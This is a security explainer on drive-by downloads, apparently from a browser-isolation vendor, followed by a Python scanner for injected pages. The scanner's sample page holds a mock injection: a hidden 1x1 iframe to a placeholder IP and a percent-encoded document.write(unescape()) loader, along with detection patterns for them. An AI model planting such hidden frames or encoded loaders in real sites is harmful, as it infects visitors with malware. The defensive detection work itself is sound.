Drive-By Download
A drive-by download is a technique attackers use to infect a user's computer or device with malware without the user's knowledge or deliberate action. It occurs when a user visits a compromised website or clicks on a malicious link, triggering the automatic download and installation of malware onto the system.
Drive-by downloads typically exploit vulnerabilities in web browsers, browser plugins, or other client software to run code on the user's device. Most often the exploited flaws are in out-of-date browsers, applications, or operating systems for which a security patch already exists but has not been applied.
Drive-by downloads exploit these flaws to infect a device with malware, and the attacks often start from legitimate websites that have been compromised, for example by injecting a hidden frame or script into the site's pages.
When a user visits the compromised site, the injected code runs in the browser, exploits the vulnerability, and fetches and installs the malware on the user's machine.
This happens without the knowledge of the targeted victim. Other variations of the attack require some user action, such as clicking a link or accepting a trojan disguised as a legitimate software update or security alert.
Drive-by downloads are most often intended to accomplish one of the following malicious activities:
- Spy on the user's activity to steal credentials, financial data, or personal identity information.
- Steal computer resources to build a botnet, mine cryptocurrency, or otherwise run unwanted work in the background of the user's computer.
- Use the computer as an entry point into a wider corporate network or into other devices the user is connected to.
- Install ransomware and hold data or the device hostage.
- Simply install malware to destroy data, cause disruption, or otherwise harm the user or business.
To protect against drive-by downloads, consider adopting the following security measures:
- Adopt a remote browser isolation (RBI) solution: RBI technology loads browsing sessions in a remotely hosted, isolated environment (a secure container or sandbox) that is separated from the local device and network. Any malicious code served by a page executes in that remote environment rather than on the user's actual device, so a drive-by download cannot install itself locally. Vade Remote Browser Isolation (RBI) opens links from email in such an isolated session, so that drive-by download attempts originating from email-borne links are executed away from the user's device. Note that isolation only covers sessions routed through it; links opened in a regular local browser, from other channels, are not protected by it.
- Update your software regularly: Keep operating systems, browsers, browser plugins, and other applications up to date so that known vulnerabilities are patched. Most drive-by downloads target flaws for which a fix already exists, so an unpatched system is the main thing that makes them work.
- Enable automatic updates: Configure your browser, business applications, and operating system to download and install security updates automatically, so that critical patches are applied as soon as they become available rather than when someone remembers to install them.
- Practice cyber vigilance: Be cautious with links and unfamiliar websites. Hover over a link to see where it actually goes before clicking it, treat a mismatch between the visible text and the destination as a warning sign, and avoid downloading files from unknown sources. Keep in mind that a hover check only reveals the destination, and a compromised legitimate site still looks legitimate, which is why patching and isolation matter more than caution alone.
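As an added example that is not part of the original page or of Vade's product, the following Python script scans an HTML document for the injection patterns described above (a hidden off-site iframe and an obfuscated inline script loader on a compromised page) and also performs the link check from the last bullet, comparing the domain shown in a link's text with the domain its href actually points to. The site host, the sample page, and the IP addresses in it are constructed for illustration, and the indicators are heuristics: a clean result is not proof that a page is safe.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical site host: frames loaded from anywhere else count as "off-site".
SITE_HOST = "example.com"

# Constructed sample page: a legitimate site into which an attacker has injected
# (a) an invisible off-site iframe and (b) an obfuscated script loader, plus one
# phishing-style link whose visible text does not match its href. The addresses
# 198.51.100.23 and 203.0.113.7 are from reserved documentation ranges.
INJECTED = "<iframe src=http://198.51.100.23/gate.php width=1 height=1></iframe>"
ENCODED = "".join("%%%02X" % b for b in INJECTED.encode())
SAMPLE_HTML = f"""<html><body>
<h1>Welcome to example.com</h1>
<a href="https://example.com/about">About us</a>
<a href="http://203.0.113.7/login">https://example.com/login</a>
<iframe src="https://example.com/widget" width="300" height="200"></iframe>
<script>document.title = "Example";</script>
<iframe src="http://198.51.100.23/gate.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>var p="{ENCODED}";document.write(unescape(p));</script>
</body></html>"""

DECODER_CALL = re.compile(r"\b(?:eval|unescape|atob|String\.fromCharCode)\s*\(")
ENCODED_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}|\\x[0-9A-Fa-f]{2}|\\u[0-9A-Fa-f]{4}){16,}")
URL_LIKE_TEXT = re.compile(r"^(?:https?://|www\.)\S+$", re.IGNORECASE)


def host_of(url):
    """Hostname of an absolute URL (or bare www.host); None for relative or javascript: URLs."""
    url = (url or "").strip()
    if not url or url.lower().startswith("javascript:"):
        return None
    if url.lower().startswith("www."):
        url = "//" + url  # treat "www.host/path" as scheme-relative so urlparse sees a netloc
    return urlparse(url).hostname


class DriveByScanner(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []   # list of (indicator, detail) tuples
        self._script = None  # text chunks while inside <script>
        self._anchor = None  # (href, text chunks) while inside <a>

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            self._check_iframe(a)
        elif tag == "script":
            self._script = []
        elif tag == "a":
            self._anchor = (a.get("href", ""), [])

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            self._check_script("".join(self._script))
            self._script = None
        elif tag == "a" and self._anchor is not None:
            href, chunks = self._anchor
            self._check_link(href, "".join(chunks))
            self._anchor = None

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)
        if self._anchor is not None:
            self._anchor[1].append(data)

    def _check_iframe(self, a):
        src = a.get("src", "")
        host = host_of(src)
        if host is None or host.lower() == self.site_host:
            return  # same-origin frames are expected on a normal page
        tiny = a.get("width", "").strip() in ("0", "1") or a.get("height", "").strip() in ("0", "1")
        style = a.get("style", "").replace(" ", "").lower()
        hidden = "display:none" in style or "visibility:hidden" in style
        if tiny or hidden:
            self.findings.append(("hidden_offsite_iframe", src))

    def _check_script(self, body):
        # A decoder call fed a long percent/hex-encoded blob is the classic shape of
        # an injected drive-by loader; ordinary inline scripts do not match both.
        if DECODER_CALL.search(body) and ENCODED_RUN.search(body):
            self.findings.append(("obfuscated_inline_script", body[:60] + "..."))

    def _check_link(self, href, text):
        text = text.strip()
        if not URL_LIKE_TEXT.match(text):
            return  # only links whose visible text claims a destination can mismatch
        shown, actual = host_of(text), host_of(href)
        if shown and actual and shown.lower() != actual.lower():
            self.findings.append(("link_text_mismatch", f"{text} -> {href}"))


def scan(html, site_host=SITE_HOST):
    """Return the drive-by indicators found in an HTML document, in page order."""
    scanner = DriveByScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for indicator, detail in scan(SAMPLE_HTML):
        print(f"{indicator}: {detail}")
```

Run against the sample it reports three findings, while the same-origin 300x200 frame and the plain inline script are left alone. In practice you would feed it HTML as fetched by a proxy or crawler, and keep the heuristics conservative: legitimate pages embed third-party frames and minified scripts all the time, so this is a triage signal for a human or a sandbox to follow up on, not a verdict.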